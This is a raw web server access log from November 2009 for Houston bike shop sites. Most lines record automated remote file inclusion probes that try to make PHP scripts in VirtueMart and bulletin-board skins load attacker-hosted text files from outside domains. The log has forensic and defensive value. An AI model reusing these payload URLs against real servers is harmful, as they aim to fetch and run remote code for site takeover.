213.79.101.98 - - [10/Nov/2009:05:47:23 -0800] "GET /logs/access.log//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:47:23 -0800] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:47:23 -0800] "GET /setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:47:55 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:47:55 -0800] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:48:17 -0800] "GET /logs/access.log//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:48:17 -0800] "GET /setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:48:17 -0800] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:50:19 -0800] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:50:19 -0800] "GET /logs/access.log//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:05:50:19 -0800] "GET /setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.254 - - [10/Nov/2009:06:04:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.115.254 - - [10/Nov/2009:06:04:23 -0800] "GET /temporarypreviewfile.html HTTP/1.0" 200 1690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
213.79.101.98 - - [10/Nov/2009:06:04:34 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:06:04:34 -0800] "GET /main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:06:04:35 -0800] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:06:05:04 -0800] "GET /logs/access.log//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:06:05:04 -0800] "GET /logs//main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:06:05:04 -0800] "GET /main.php?sayfa=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:06:19:32 -0800] "GET /include/write.php?dir=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:06:19:36 -0800] "GET /logs//include/write.php?dir=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:06:19:36 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:06:23:51 -0800] "GET /logs/access.log//include/write.php?dir=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.254 - - [10/Nov/2009:06:37:27 -0800] "GET /Employeesite/ HTTP/1.0" 401 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
195.254.134.50 - - [10/Nov/2009:06:41:20 -0800] "GET /login.php?dir=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 - "-" "-" "houstonbikeshop.com"
67.195.115.254 - - [10/Nov/2009:06:43:06 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
124.115.6.10 - - [10/Nov/2009:07:06:07 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "bicyclestoreshouston.com"
213.79.101.98 - - [10/Nov/2009:07:07:58 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:07:58 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1767 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:07:58 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 2377 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:11:08 -0800] "GET /translations/Polish.txt%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:11:08 -0800] "GET /translations//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 3864 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:34:21 -0800] "GET /logs/access.log//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:34:21 -0800] "GET /logs//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:07:34:22 -0800] "GET /?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:39:39 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:39:39 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 200 1767 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:39:39 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 200 2377 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:43:25 -0800] "GET /translations/Polish.txt%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:43:25 -0800] "GET /translations//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 200 3864 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:45:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.123.212.188 - - [10/Nov/2009:07:45:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.123.212.188 - - [10/Nov/2009:07:45:26 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.123.212.188 - - [10/Nov/2009:07:47:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:47:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:47:16 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:47:53 -0800] "GET /logs/access.log//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.227.134.140 - - [10/Nov/2009:07:49:38 -0800] "GET /translations/Polish.txt//////?_SERVER[DOCUMENT_ROOT]=http://www.phoenixalpine.com/zboard/data/test/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:53:18 -0800] "GET /logs/access.log//error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:53:19 -0800] "GET /error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:53:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:53:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:53:19 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:53:20 -0800] "GET /logs//error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:54:12 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:55:32 -0800] "GET /logs/access.log//error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:55:32 -0800] "GET /error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.149.84.14 - - [10/Nov/2009:07:55:33 -0800] "GET /logs//error.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:07:57:56 -0800] "GET /logs/scripts.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.123.212.188 - - [10/Nov/2009:08:02:41 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:08:10:23 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:08:10:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:08:10:24 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:13 -0800] "GET /logs/access.log%20%20//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:13 -0800] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:13 -0800] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:20 -0800] "GET /logs//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:20 -0800] "GET /write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [10/Nov/2009:08:13:20 -0800] "GET /logs/access.log//write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [10/Nov/2009:08:21:10 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.198.53.208 - - [10/Nov/2009:08:34:21 -0800] "GET /bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.198.53.208 - - [10/Nov/2009:08:34:21 -0800] "GET /logs//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.198.53.208 - - [10/Nov/2009:08:34:21 -0800] "GET /logs/access.log%20%20//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:20 -0800] "GET /error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:20 -0800] "GET /logs/access.log//error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:20 -0800] "GET /logs//error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:21 -0800] "GET /logs/access.log//error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:21 -0800] "GET /error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [10/Nov/2009:08:42:21 -0800] "GET /logs//error.php?dir=http://www.aresmu.com/appserv/info.php%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:51 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:51 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:43:53 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:49:51 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:08:49:59 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
94.198.53.208 - - [10/Nov/2009:08:50:04 -0800] "GET /logs/access.log//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:09:01:29 -0800] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:09:01:39 -0800] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.5.84 - - [10/Nov/2009:09:01:39 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://sogospelnews.com/links/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.181 - - [10/Nov/2009:09:05:03 -0800] "GET /logs/access_090110.log HTTP/1.0" 200 8455766 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
94.30.133.2 - - [10/Nov/2009:09:16:04 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "houstonbikeshop.com"
94.30.133.2 - - [10/Nov/2009:09:16:32 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "bicyclestoreshouston.com"
67.205.103.171 - - [10/Nov/2009:09:17:17 -0800] "GET /include/write.php?dir=http://www.qchatting.com/ezshop/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [10/Nov/2009:09:17:22 -0800] "GET /logs//include/write.php?dir=http://www.qchatting.com/ezshop/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [10/Nov/2009:09:17:22 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.qchatting.com/ezshop/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:31 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:31 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:32 -0800] "GET /logs/access.log//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:32 -0800] "GET /logs/access.log//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:32 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:22:32 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:28 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:28 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:28 -0800] "GET /logs/access.log%20%20//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:42 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:42 -0800] "GET /logs/access.log%20%20//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Nov/2009:09:23:42 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [10/Nov/2009:09:25:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [10/Nov/2009:09:25:09 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [10/Nov/2009:09:25:09 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.151.164.188 - - [10/Nov/2009:09:41:29 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
201.151.164.188 - - [10/Nov/2009:09:41:31 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
202.123.212.188 - - [10/Nov/2009:09:58:44 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:09:58:44 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.123.212.188 - - [10/Nov/2009:09:58:44 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
